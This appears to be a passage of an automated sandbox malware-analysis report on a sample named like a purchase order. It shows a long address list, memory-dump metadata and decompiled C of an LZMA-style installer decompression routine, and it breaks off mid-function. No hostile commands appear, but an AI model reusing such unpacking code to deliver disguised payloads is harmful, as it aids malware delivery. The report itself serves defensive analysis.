                                                                                      0x00407222
                                                                                      0x00407222
                                                                                      0x00407225
                                                                                      0x00407228
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406df8
                                                                                      0x00406df8
                                                                                      0x00406dfc
                                                                                      0x00407569
                                                                                      0x00000000
                                                                                      0x00407569
                                                                                      0x00406e02
                                                                                      0x00406e05
                                                                                      0x00406e08
                                                                                      0x00406e0c
                                                                                      0x00406e0f
                                                                                      0x00406e15
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e1a
                                                                                      0x00406e1d
                                                                                      0x00406e1d
                                                                                      0x00406e20
                                                                                      0x00406e23
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e29
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e35
                                                                                      0x00406e35
                                                                                      0x00406e39
                                                                                      0x00406e3c
                                                                                      0x00406e3f
                                                                                      0x00406e42
                                                                                      0x00406e45
                                                                                      0x00406e46
                                                                                      0x00406e49
                                                                                      0x00406e4b
                                                                                      0x00406e51
                                                                                      0x00406e54
                                                                                      0x00406e57
                                                                                      0x00406e5a
                                                                                      0x00406e5d
                                                                                      0x00406e60
                                                                                      0x00406e63
                                                                                      0x00406e7f
                                                                                      0x00406e82
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8f
                                                                                      0x00406e93
                                                                                      0x00406e95
                                                                                      0x00406e99
                                                                                      0x00406e65
                                                                                      0x00406e65
                                                                                      0x00406e69
                                                                                      0x00406e71
                                                                                      0x00406e76
                                                                                      0x00406e78
                                                                                      0x00406e7a
                                                                                      0x00406e7a
                                                                                      0x00406e9c
                                                                                      0x00406ea3
                                                                                      0x00406ea6
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00000000
                                                                                      0x00406eb1
                                                                                      0x00406eb1
                                                                                      0x00406eb5
                                                                                      0x00407575
                                                                                      0x00000000
                                                                                      0x00407575
                                                                                      0x00406ebb
                                                                                      0x00406ebe
                                                                                      0x00406ec1
                                                                                      0x00406ec5
                                                                                      0x00406ec8
                                                                                      0x00406ece
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed3
                                                                                      0x00406ed6
                                                                                      0x00406ed6
                                                                                      0x00406ed6
                                                                                      0x00406edc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ede
                                                                                      0x00406ee1
                                                                                      0x00406ee4
                                                                                      0x00406ee7
                                                                                      0x00406eea
                                                                                      0x00406eed
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00406ef6
                                                                                      0x00406ef9
                                                                                      0x00406efc
                                                                                      0x00406f14
                                                                                      0x00406f17
                                                                                      0x00406f1a
                                                                                      0x00406f1d
                                                                                      0x00406f1d
                                                                                      0x00406f20
                                                                                      0x00406f24
                                                                                      0x00406f26
                                                                                      0x00406efe
                                                                                      0x00406efe
                                                                                      0x00406f06
                                                                                      0x00406f0b
                                                                                      0x00406f0d
                                                                                      0x00406f0f
                                                                                      0x00406f0f
                                                                                      0x00406f29
                                                                                      0x00406f30
                                                                                      0x00406f33
                                                                                      0x00000000
                                                                                      0x00406f35
                                                                                      0x00000000
                                                                                      0x00406f35
                                                                                      0x00406f33
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f75
                                                                                      0x00406f75
                                                                                      0x00406f79
                                                                                      0x00407581
                                                                                      0x00000000
                                                                                      0x00407581
                                                                                      0x00406f7f
                                                                                      0x00406f82
                                                                                      0x00406f85
                                                                                      0x00406f89
                                                                                      0x00406f8c
                                                                                      0x00406f92
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f97
                                                                                      0x00406f9a
                                                                                      0x00406f9a
                                                                                      0x00406fa0
                                                                                      0x00406f3e
                                                                                      0x00406f3e
                                                                                      0x00406f41
                                                                                      0x00000000
                                                                                      0x00406f41
                                                                                      0x00406fa2
                                                                                      0x00406fa2
                                                                                      0x00406fa5
                                                                                      0x00406fa8
                                                                                      0x00406fab
                                                                                      0x00406fae
                                                                                      0x00406fb1
                                                                                      0x00406fb4
                                                                                      0x00406fb7
                                                                                      0x00406fba
                                                                                      0x00406fbd
                                                                                      0x00406fc0
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe1
                                                                                      0x00406fe1
                                                                                      0x00406fe4
                                                                                      0x00406fe8
                                                                                      0x00406fea
                                                                                      0x00406fc2
                                                                                      0x00406fc2
                                                                                      0x00406fca
                                                                                      0x00406fcf
                                                                                      0x00406fd1
                                                                                      0x00406fd3
                                                                                      0x00406fd3
                                                                                      0x00406fed
                                                                                      0x00406ff4
                                                                                      0x00406ff7
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00000000
                                                                                      0x00407286
                                                                                      0x00407286
                                                                                      0x0040728a
                                                                                      0x004075b1
                                                                                      0x00000000
                                                                                      0x004075b1
                                                                                      0x00407290
                                                                                      0x00407293
                                                                                      0x00407296
                                                                                      0x0040729a
                                                                                      0x0040729d
                                                                                      0x004072a3
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a5
                                                                                      0x004072a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407395
                                                                                      0x00407399
                                                                                      0x004073bb
                                                                                      0x004073be
                                                                                      0x004073c8
                                                                                      0x00000000
                                                                                      0x004073c8
                                                                                      0x0040739b
                                                                                      0x0040739e
                                                                                      0x004073a2
                                                                                      0x004073a5
                                                                                      0x004073a5
                                                                                      0x004073a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407452
                                                                                      0x00407456
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x00407474
                                                                                      0x0040747b
                                                                                      0x00407482
                                                                                      0x00407489
                                                                                      0x00407489
                                                                                      0x00000000
                                                                                      0x00407489
                                                                                      0x00407458
                                                                                      0x0040745b
                                                                                      0x0040745e
                                                                                      0x00407461
                                                                                      0x00407468
                                                                                      0x004073ac
                                                                                      0x004073ac
                                                                                      0x004073af
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407543
                                                                                      0x00407546
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040717d
                                                                                      0x0040717f
                                                                                      0x00407186
                                                                                      0x00407187
                                                                                      0x00407189
                                                                                      0x0040718c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407194
                                                                                      0x00407197
                                                                                      0x0040719a
                                                                                      0x0040719c
                                                                                      0x0040719e
                                                                                      0x0040719e
                                                                                      0x0040719f
                                                                                      0x004071a2
                                                                                      0x004071a9
                                                                                      0x004071ac
                                                                                      0x004071ba
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407490
                                                                                      0x00407490
                                                                                      0x00407493
                                                                                      0x0040749a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040749f
                                                                                      0x0040749f
                                                                                      0x004074a3
                                                                                      0x004075db
                                                                                      0x00000000
                                                                                      0x004075db
                                                                                      0x004074a9
                                                                                      0x004074ac
                                                                                      0x004074af
                                                                                      0x004074b3
                                                                                      0x004074b6
                                                                                      0x004074bc
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074be
                                                                                      0x004074c1
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c4
                                                                                      0x004074c7
                                                                                      0x004074c7
                                                                                      0x004074cb
                                                                                      0x0040752b
                                                                                      0x0040752e
                                                                                      0x00407533
                                                                                      0x00407534
                                                                                      0x00407536
                                                                                      0x00407538
                                                                                      0x0040753b
                                                                                      0x00000000
                                                                                      0x0040753b
                                                                                      0x004074cd
                                                                                      0x004074d3
                                                                                      0x004074d6
                                                                                      0x004074d9
                                                                                      0x004074dc
                                                                                      0x004074df
                                                                                      0x004074e2
                                                                                      0x004074e5
                                                                                      0x004074e8
                                                                                      0x004074eb
                                                                                      0x004074ee
                                                                                      0x00407507
                                                                                      0x0040750a
                                                                                      0x0040750d
                                                                                      0x00407510
                                                                                      0x00407514
                                                                                      0x00407516
                                                                                      0x00407516
                                                                                      0x00407517
                                                                                      0x0040751a
                                                                                      0x004074f0
                                                                                      0x004074f0
                                                                                      0x004074f8
                                                                                      0x004074fd
                                                                                      0x004074ff
                                                                                      0x00407502
                                                                                      0x00407502
                                                                                      0x0040751d
                                                                                      0x00407524
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x00407526
                                                                                      0x00000000
                                                                                      0x004071c2
                                                                                      0x004071c5
                                                                                      0x004071fb
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732b
                                                                                      0x0040732e
                                                                                      0x0040732e
                                                                                      0x00407331
                                                                                      0x00407333
                                                                                      0x004075bd
                                                                                      0x00000000
                                                                                      0x004075bd
                                                                                      0x00407339
                                                                                      0x0040733c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407342
                                                                                      0x00407346
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00407349
                                                                                      0x00000000
                                                                                      0x00407349
                                                                                      0x004071c7
                                                                                      0x004071c9
                                                                                      0x004071cb
                                                                                      0x004071cd
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d5
                                                                                      0x004071d8
                                                                                      0x004071db
                                                                                      0x004071f1
                                                                                      0x004071f6
                                                                                      0x0040722e
                                                                                      0x0040722e
                                                                                      0x00407232
                                                                                      0x0040725e
                                                                                      0x00407260
                                                                                      0x00407267
                                                                                      0x0040726a
                                                                                      0x0040726d
                                                                                      0x0040726d
                                                                                      0x00407272
                                                                                      0x00407272
                                                                                      0x00407274
                                                                                      0x00407277
                                                                                      0x0040727e
                                                                                      0x00407281
                                                                                      0x004072ae
                                                                                      0x004072ae
                                                                                      0x004072b1
                                                                                      0x004072b4
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00407328
                                                                                      0x00000000
                                                                                      0x00407328
                                                                                      0x004072b6
                                                                                      0x004072bc
                                                                                      0x004072bf
                                                                                      0x004072c2
                                                                                      0x004072c5
                                                                                      0x004072c8
                                                                                      0x004072cb
                                                                                      0x004072ce
                                                                                      0x004072d1
                                                                                      0x004072d4
                                                                                      0x004072d7
                                                                                      0x004072f0
                                                                                      0x004072f2
                                                                                      0x004072f5
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072fb
                                                                                      0x004072fe
                                                                                      0x00407300
                                                                                      0x00407302
                                                                                      0x00407305
                                                                                      0x00407307
                                                                                      0x0040730a
                                                                                      0x0040730e
                                                                                      0x00407310
                                                                                      0x00407310
                                                                                      0x00407311
                                                                                      0x00407314
                                                                                      0x00407317
                                                                                      0x004072d9
                                                                                      0x004072d9
                                                                                      0x004072e1
                                                                                      0x004072e6
                                                                                      0x004072e8
                                                                                      0x004072eb
                                                                                      0x004072eb
                                                                                      0x0040731a
                                                                                      0x00407321
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00000000
                                                                                      0x00407323
                                                                                      0x00407321
                                                                                      0x00407234
                                                                                      0x00407237
                                                                                      0x00407239
                                                                                      0x0040723c
                                                                                      0x0040723f
                                                                                      0x00407242
                                                                                      0x00407244
                                                                                      0x00407247
                                                                                      0x0040724a
                                                                                      0x0040724a
                                                                                      0x0040724d
                                                                                      0x0040724d
                                                                                      0x00407250
                                                                                      0x00407257
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x0040722b
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00000000
                                                                                      0x00407259
                                                                                      0x00407257
                                                                                      0x004071dd
                                                                                      0x004071e0
                                                                                      0x004071e2
                                                                                      0x004071e5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f44
                                                                                      0x00406f44
                                                                                      0x00406f48
                                                                                      0x0040758d
                                                                                      0x00000000
                                                                                      0x0040758d
                                                                                      0x00406f4e
                                                                                      0x00406f51
                                                                                      0x00406f54
                                                                                      0x00406f57
                                                                                      0x00406f5a
                                                                                      0x00406f5d
                                                                                      0x00406f60
                                                                                      0x00406f62
                                                                                      0x00406f65
                                                                                      0x00406f68
                                                                                      0x00406f6b
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x0040734c
                                                                                      0x00407350
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407356
                                                                                      0x00407359
                                                                                      0x0040735c
                                                                                      0x0040735f
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407361
                                                                                      0x00407364
                                                                                      0x00407367
                                                                                      0x0040736a
                                                                                      0x0040736d
                                                                                      0x00407370
                                                                                      0x00407373
                                                                                      0x00407374
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407376
                                                                                      0x00407379
                                                                                      0x0040737c
                                                                                      0x0040737f
                                                                                      0x00407382
                                                                                      0x00407385
                                                                                      0x00407389
                                                                                      0x0040738b
                                                                                      0x0040738e
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x00000000
                                                                                      0x00407390
                                                                                      0x0040738e
                                                                                      0x004075c3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                      • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                      • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                      • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 98%
                                                                                      			E00406FFE() {
                                                                                      				signed int _t539;
                                                                                      				unsigned short _t540;
                                                                                      				signed int _t541;
                                                                                      				void _t542;
                                                                                      				signed int _t543;
                                                                                      				signed int _t544;
                                                                                      				signed int _t573;
                                                                                      				signed int _t576;
                                                                                      				signed int _t597;
                                                                                      				signed int* _t614;
                                                                                      				void* _t621;
                                                                                      
                                                                                      				L0:
                                                                                      				while(1) {
                                                                                      					L0:
                                                                                      					if( *(_t621 - 0x40) != 1) {
                                                                                      						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                      						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                      						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                      						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                      						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                      						_t539 =  *(_t621 - 4) + 0x664;
                                                                                      						 *(_t621 - 0x58) = _t539;
                                                                                      						goto L68;
                                                                                      					} else {
                                                                                      						 *(__ebp - 0x84) = 8;
                                                                                      						while(1) {
                                                                                      							L132:
                                                                                      							 *(_t621 - 0x54) = _t614;
                                                                                      							while(1) {
                                                                                      								L133:
                                                                                      								_t540 =  *_t614;
                                                                                      								_t597 = _t540 & 0x0000ffff;
                                                                                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                      								if( *(_t621 - 0xc) >= _t573) {
                                                                                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                      									 *(_t621 - 0x40) = 1;
                                                                                      									_t541 = _t540 - (_t540 >> 5);
                                                                                      									 *_t614 = _t541;
                                                                                      								} else {
                                                                                      									 *(_t621 - 0x10) = _t573;
                                                                                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                      								}
                                                                                      								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                      									goto L139;
                                                                                      								}
                                                                                      								L137:
                                                                                      								if( *(_t621 - 0x6c) == 0) {
                                                                                      									 *(_t621 - 0x88) = 5;
                                                                                      									L170:
                                                                                      									_t576 = 0x22;
                                                                                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                      									_t544 = 0;
                                                                                      									L172:
                                                                                      									return _t544;
                                                                                      								}
                                                                                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                      								L139:
                                                                                      								_t542 =  *(_t621 - 0x84);
                                                                                      								while(1) {
                                                                                      									 *(_t621 - 0x88) = _t542;
                                                                                      									while(1) {
                                                                                      										L1:
                                                                                      										_t543 =  *(_t621 - 0x88);
                                                                                      										if(_t543 > 0x1c) {
                                                                                      											break;
                                                                                      										}
                                                                                      										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                                                      											case 0:
                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                      												_t543 =  *( *(_t621 - 0x70));
                                                                                      												if(_t543 > 0xe1) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												_t547 = _t543 & 0x000000ff;
                                                                                      												_push(0x2d);
                                                                                      												asm("cdq");
                                                                                      												_pop(_t578);
                                                                                      												_push(9);
                                                                                      												_pop(_t579);
                                                                                      												_t617 = _t547 / _t578;
                                                                                      												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                      												asm("cdq");
                                                                                      												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                      												 *(_t621 - 0x3c) = _t612;
                                                                                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                      													L10:
                                                                                      													if(_t620 == 0) {
                                                                                      														L12:
                                                                                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                      														goto L15;
                                                                                      													} else {
                                                                                      														goto L11;
                                                                                      													}
                                                                                      													do {
                                                                                      														L11:
                                                                                      														_t620 = _t620 - 1;
                                                                                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                      													} while (_t620 != 0);
                                                                                      													goto L12;
                                                                                      												}
                                                                                      												if( *(_t621 - 4) != 0) {
                                                                                      													GlobalFree( *(_t621 - 4));
                                                                                      												}
                                                                                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      												 *(_t621 - 4) = _t543;
                                                                                      												if(_t543 == 0) {
                                                                                      													goto L171;
                                                                                      												} else {
                                                                                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                      													goto L10;
                                                                                      												}
                                                                                      											case 1:
                                                                                      												L13:
                                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                      													 *(_t621 - 0x88) = 1;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                      												_t45 = _t621 - 0x48;
                                                                                      												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                      												__eflags =  *_t45;
                                                                                      												L15:
                                                                                      												if( *(_t621 - 0x48) < 4) {
                                                                                      													goto L13;
                                                                                      												}
                                                                                      												_t555 =  *(_t621 - 0x40);
                                                                                      												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                      													L20:
                                                                                      													 *(_t621 - 0x48) = 5;
                                                                                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                      													goto L23;
                                                                                      												}
                                                                                      												 *(_t621 - 0x74) = _t555;
                                                                                      												if( *(_t621 - 8) != 0) {
                                                                                      													GlobalFree( *(_t621 - 8));
                                                                                      												}
                                                                                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                      												 *(_t621 - 8) = _t543;
                                                                                      												if(_t543 == 0) {
                                                                                      													goto L171;
                                                                                      												} else {
                                                                                      													goto L20;
                                                                                      												}
                                                                                      											case 2:
                                                                                      												L24:
                                                                                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                      												 *(_t621 - 0x84) = 6;
                                                                                      												 *(_t621 - 0x4c) = _t562;
                                                                                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                      												goto L132;
                                                                                      											case 3:
                                                                                      												L21:
                                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                                      													 *(_t621 - 0x88) = 3;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                      												_t67 = _t621 - 0x70;
                                                                                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                      												__eflags =  *_t67;
                                                                                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                      												L23:
                                                                                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                      												if( *(_t621 - 0x48) != 0) {
                                                                                      													goto L21;
                                                                                      												}
                                                                                      												goto L24;
                                                                                      											case 4:
                                                                                      												L133:
                                                                                      												_t540 =  *_t614;
                                                                                      												_t597 = _t540 & 0x0000ffff;
                                                                                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                      												if( *(_t621 - 0xc) >= _t573) {
                                                                                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                      													 *(_t621 - 0x40) = 1;
                                                                                      													_t541 = _t540 - (_t540 >> 5);
                                                                                      													 *_t614 = _t541;
                                                                                      												} else {
                                                                                      													 *(_t621 - 0x10) = _t573;
                                                                                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                      												}
                                                                                      												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                      													goto L139;
                                                                                      												}
                                                                                      											case 5:
                                                                                      												goto L137;
                                                                                      											case 6:
                                                                                      												__edx = 0;
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x34) = 1;
                                                                                      													 *(__ebp - 0x84) = 7;
                                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      													L132:
                                                                                      													 *(_t621 - 0x54) = _t614;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      												__esi =  *(__ebp - 0x60);
                                                                                      												__cl = 8;
                                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                                      														_t98 = __ebp - 0x38;
                                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      														__eflags =  *_t98;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      													}
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) = 0;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                                      													__ebx = 0;
                                                                                      													__ebx = 1;
                                                                                      													goto L61;
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                      														__eflags = __eax;
                                                                                      													}
                                                                                      													__ecx =  *(__ebp - 8);
                                                                                      													__ebx = 0;
                                                                                      													__ebx = 1;
                                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      													goto L41;
                                                                                      												}
                                                                                      											case 7:
                                                                                      												goto L0;
                                                                                      											case 8:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x38);
                                                                                      													__ecx =  *(__ebp - 4);
